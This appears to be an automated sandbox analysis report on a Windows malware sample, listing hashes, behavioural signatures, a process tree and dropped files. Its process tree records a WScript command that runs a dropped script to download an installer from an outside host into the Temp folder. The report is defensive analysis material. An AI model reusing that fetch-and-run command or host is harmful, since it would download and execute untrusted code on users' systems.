Analysis
-
max time kernel
119s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
11-05-2024 21:49
Static task
static1
Behavioral task
behavioral1
Sample
36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe
Resource
win10v2004-20240426-en
General
-
Target
36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe
-
Size
184KB
-
MD5
36b77f9deebcf77fcc62c6da9bc55994
-
SHA1
0187da02d35ed149ecbb60da4e661ff7245bc9a7
-
SHA256
488bbf10a6a87a7deb46fb030292cd646960b1af392c3fe0da5f288e895e585a
-
SHA512
bd2d68caf1b56490726f4c325012b1eabf79e1dd737d1b8039a839625c4fb77b8536cac456007d4958f669eaf4fd9986318f6115b3738c035b48951dba44e227
-
SSDEEP
3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3L:/7BSH8zUB+nGESaaRvoB7FJNndn2
Malware Config
Signatures
-
Blocklisted process makes network request 11 IoCs
flow pid Process 6 1696 WScript.exe 8 1696 WScript.exe 10 1696 WScript.exe 12 2516 WScript.exe 13 2516 WScript.exe 15 2004 WScript.exe 16 2004 WScript.exe 18 2212 WScript.exe 19 2212 WScript.exe 25 2088 WScript.exe 26 2088 WScript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 2424 wrote to memory of 1696 2424 36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe 28 PID 2424 wrote to memory of 1696 2424 36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe 28 PID 2424 wrote to memory of 1696 2424 36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe 28 PID 2424 wrote to memory of 1696 2424 36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe 28 PID 2424 wrote to memory of 2516 2424 36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe 30 PID 2424 wrote to memory of 2516 2424 36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe 30 PID 2424 wrote to memory of 2516 2424 36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe 30 PID 2424 wrote to memory of 2516 2424 36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe 30 PID 2424 wrote to memory of 2004 2424 36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe 32 PID 2424 wrote to memory of 2004 2424 36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe 32 PID 2424 wrote to memory of 2004 2424 36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe 32 PID 2424 wrote to memory of 2004 2424 36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe 32 PID 2424 wrote to memory of 2212 2424 36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe 34 PID 2424 wrote to memory of 2212 2424 36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe 34 PID 2424 wrote to memory of 2212 2424 36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe 34 PID 2424 wrote to memory of 2212 2424 36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe 34 PID 2424 wrote to memory of 2088 2424 36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe 38 PID 2424 wrote to memory of 2088 2424 36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe 38 PID 2424 wrote to memory of 2088 2424 36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe 38 PID 2424 wrote to memory of 2088 2424 36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2424 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2359.js" http://www.djapp.info/?dotnet=4&file=installer C:\Users\Admin\AppData\Local\Temp\fuf2359.exe2⤵
- Blocklisted process makes network request
PID:1696
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2359.js" http://www.djapp.info/?dotnet=4&file=installer C:\Users\Admin\AppData\Local\Temp\fuf2359.exe2⤵
- Blocklisted process makes network request
PID:2516
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2359.js" http://www.djapp.info/?dotnet=4&file=installer C:\Users\Admin\AppData\Local\Temp\fuf2359.exe2⤵
- Blocklisted process makes network request
PID:2004
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2359.js" http://www.djapp.info/?dotnet=4&file=installer C:\Users\Admin\AppData\Local\Temp\fuf2359.exe2⤵
- Blocklisted process makes network request
PID:2212
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2359.js" http://www.djapp.info/?dotnet=4&file=installer C:\Users\Admin\AppData\Local\Temp\fuf2359.exe2⤵
- Blocklisted process makes network request
PID:2088
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize1KB
MD5844a93e096b7ac8f56f9286642d59fed
SHA16bf7e649df885f4338d9b84864c4fb2c6d06d2ed
SHA2565a344dea279de4e33fd977f55d63b9518cac5ad62e2e5cd09a81f56ced29eddb
SHA512eea9f130fdbb0b0ad23e0fcfc25c14be2827cb641f1d1a6aa2097a1e8b9b81e8e3ebc5633f8fccac60039d361da971f1c5e1085371ca23bc0c3c125bdddd60df
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize724B
MD58202a1cd02e7d69597995cabbe881a12
SHA18858d9d934b7aa9330ee73de6c476acf19929ff6
SHA25658f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA51297ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize410B
MD50211d032752fa7708b086e24c137de1d
SHA112b45877562914e3cfb39048063e0c843c00685a
SHA25613fbd17d8c8560e991131140cec5536f896966671e94aac9105ec1332efae235
SHA5124b31365df75c361febaff904246297f581f2ced3839f32f6d5e66a3855ed2a62f26550c2718ff6698c625774d55df4e9b71174e81e8e8fc319e6812edb959228
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5b7b1f8873696419f4364540ba5d6002b
SHA1e86b49c21590e605d313f60e95554a879a405fb0
SHA25631d9cf9b567a39c7db288431a2e0b3725aa976bf6dbb67afee5a233e7d71dfdc
SHA512fabc8d079de03fae7eb9ef1d0b80b448c7673a3afdaadf484727dd4d4f2ea426af3375b8a4d8a98680ee837de64e22cfd593d02a9deaf318e13540d6efdf6dd2
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize392B
MD5abf22e1b086a79e5b39991bfe77196aa
SHA14bd5292871a129eee5bf3b0b579e499f67ac2218
SHA256eb5464f9f4f99bf341ad6d1af1434656c53f6f58c1aba33b69ad5f70325a1850
SHA51289adff9b30cf0110bb52a3a11eeb1eba1c4e61c1b38fe7fe69b26b337e3fe93590e05be187f2e920527dcaf24ecb2ba6c38dbb63352b4962b7cc5660f713e2c8
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2XHJXO3H\domain_profile[1].htm
Filesize40KB
MD5bdd845e8776dc7d46e2f2755af60892e
SHA1ba62ef4b89773dfa6753cd7c39e18388eff3ce33
SHA2569bf90d3712349c7fb0bd2877923f98c77789e9bcbb7e544ba8e5d61fa6cdac3b
SHA51281a661570ea1f82189365f3f9e6c31812a85bd92b65e674ae01df700c43225995a434c751ed710dd65ffd8e3c0091d58ed4d32e5de16b5873ea3cbd8286842ad
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2XHJXO3H\domain_profile[1].htm
Filesize40KB
MD5923ab9d2edf19ff3412e06d73dd1da77
SHA162ba6cf4214028d0c674f290679ea6f82b59d093
SHA25628b7948b4a13b8c975a5cb08cfc9a90b1d6e63d95323a14e5a4e64744869555e
SHA51225f49c4ffd6ca5adfc16bb6bb9bba89e16a1e18973cb4a854f43bfc287e0604f2ef6d7a746896c48cd3975b7445f1fbc1619a0ea7433ee5eaa7683e6df6f21fe
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H09CVCL3\domain_profile[1].htm
Filesize6KB
MD5d615e9b74470164a6669f3b0ff787e7b
SHA13c6456e4dea05bd39b33f75a5a2e882f7b4edcdf
SHA25605e71ae87c9bdfe255beac821c0371a3cc22e513cdc9c514149ece84b2804693
SHA5129f6948eb84db3d60bd08291fb10989f559165401d00fc0e0f987b1dfd345abc6f7865b906b4c54c177289c80c9305f43fa5177db495c668d055e59860689b7f4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H09CVCL3\domain_profile[1].htm
Filesize40KB
MD5b22769cfe4cd018b036d01cca9cd2837
SHA155e06bba7f4cab5f04127b38fece10affe5e0469
SHA256dcd55a9dc7e5138fbca694f8486975fc38165439a69c4fb3eb6b305f18813d87
SHA5121c5fdee0b441c1eb782f5f4f5808e2661a6971723d95adc68fdf5c0998859000cabb5c890e09474a3d4442b416d125258f670ee89501a40c73d7b0a9204ce4a7
-
Filesize
68KB
MD529f65ba8e88c063813cc50a4ea544e93
SHA105a7040d5c127e68c25d81cc51271ffb8bef3568
SHA2561ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa
-
Filesize
177KB
MD5435a9ac180383f9fa094131b173a2f7b
SHA176944ea657a9db94f9a4bef38f88c46ed4166983
SHA25667dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA5121a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a
-
Filesize
3KB
MD53813cab188d1de6f92f8b82c2059991b
SHA14807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb
SHA256a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e
SHA51283b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76
-
Filesize
175B
MD592451270d1ea8a013e1620e216fe5456
SHA1d5b1b80f5991f9f201ea56900f02035193a837c1
SHA256632d1aae8a74d32b7f006d1a78f0f5d41ee5ca97d5b730e997c0d00028ee0efb
SHA512c63b2c1bd3d6faf275e182ee6ce0afbfbec869e33462ea94cd81abe76ed1409c4e188255afd686b42661320e8ba70e7dab565439d2ad5de72410a3357d23e9bb